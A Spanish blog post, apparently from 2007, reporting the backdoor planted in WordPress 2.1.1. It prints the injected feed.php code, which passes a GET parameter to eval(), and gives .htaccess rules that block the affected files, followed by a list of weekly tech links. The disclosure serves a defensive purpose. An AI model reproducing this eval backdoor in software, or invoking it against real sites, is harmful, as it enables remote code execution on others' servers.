Si has descargado e instalado la versión 2.1.1 de wordpress durante la última semana que sepas que tienes un pequeño problema que resolver. Algo así es lo que dicen en su blog oficial. Por lo visto un cracker ha tenido acceso al código de esta versión durante los últimos días y ha introducido en el mismo unas líneas que permiten la ejecución arbitraria de código de forma remota, concretamente en los ficheros feed.php y theme.php.

Para los curiosos, en buayacorp nos muestran el código introducido en el fichero feed.php:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}

...

if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

La solución pasa por dar la mayor difusión a la noticia (para los despistados que no lean las notas que wordpress publica en su tablero inicial), actualizar lo antes posible a la nueva versión 2.1.2 que corrige este y, “poyaque” estamos, otros problemas o si no te es posible esto último usar la solución alternativa que sugieren en el blog de dreamhost e introducir las siguientes reglas de bloqueo en el fichero .htaccess de tu apache:

< Files theme.php >
order allow,deny
deny from all
< /Files >

< Files feed.php >
order allow,deny
deny from all
< /Files >

La semana no ha dado para mucho, la verdad. Al menos para mi. Pero para no perder la costumbre hay van las cosas más interesantes que he marcado en mis favoritos durante estos últimos siete días:

• Show us the code :\> Iniciativa que parte de una carta abierta a Steve Ballmer. ¿Que Linux viola la propiedad intelectual de Microsoft? No pasa nada: que digan dónde y se cambia…

• ¿Preinstalará Dell Linux en sus equipos o no? A principio de semana era que si. Luego parece que la cosa quedó en que no… ¡Pero que estrés!
• Ya hay un keygen para el código de activación de windows Vista. O eso es lo que dicen… Yo, la verdad, no tengo mucho interés por el momento pero a quien le interese aquí tiene el hilo del foro dónde se encuentra el presunto generador de claves (para acceder al foro es preciso registro previo). Pues no, parece que todo era una broma..
• 20 minutos suprime los anuncios de prostitución. Y, por el momento, parece ser el único periódico que prescindirá de este suculento biberón. Ni el ABC, ni La Razón (por decir dos de los más cercanos a “Dios Nuestro Señor”, vamos) ni ningún otro. En fin…
• Un gusano en Solaris Sin consecuencias, pero ahí está. Detalles aquí.
• HotSpots Wifi. Hotspotr es un proyecto basado en Google Maps para marcar los puntos de acceso wifi gratuitos o de pago. Por el momento no parece tener mucho éxito en Europa (y menos en nuestro país), pero habrá que seguirlo a ver que tal.
• ¿Otro pseudo-Digg más?. O tal vez no sea sólo eso… coRank tiene características que lo hacen algo distinto a los demás. Lo explican muy bien en Error500. Ricardo Galli, autor de Menéame, también opina sobre este nuevo servicio.